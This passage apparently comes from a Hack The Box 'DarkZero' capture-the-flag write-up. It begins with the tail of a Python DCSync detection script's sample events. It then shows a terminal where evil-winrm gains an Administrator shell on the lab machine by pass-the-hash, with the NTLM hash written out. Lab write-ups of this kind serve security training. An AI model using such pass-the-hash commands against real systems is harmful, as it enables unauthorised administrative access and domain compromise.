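    {"EventID": 4662, "SubjectUserName": "svc_sql", "SubjectLogonId": "0x5e6f", "AccessMask": "0x100",
     "Properties": "{00299570-246d-11d0-a768-00aa006e0529}"},  # User-Force-Change-Password, not replication
]

if __name__ == "__main__":
    for alert in dcsync_alerts(SAMPLE_EVENTS):
        print(alert)
```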
┌──(kali@kali)-[~/HTB/DarkZero]
└─$ evil-winrm -i 10.129.174.93 -u Administrator -H 5917507bdf2ef2c2b0a869a1cba40726
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>
- The Season 9 - DarkZero Machine on Hack-The-Box was now complete.
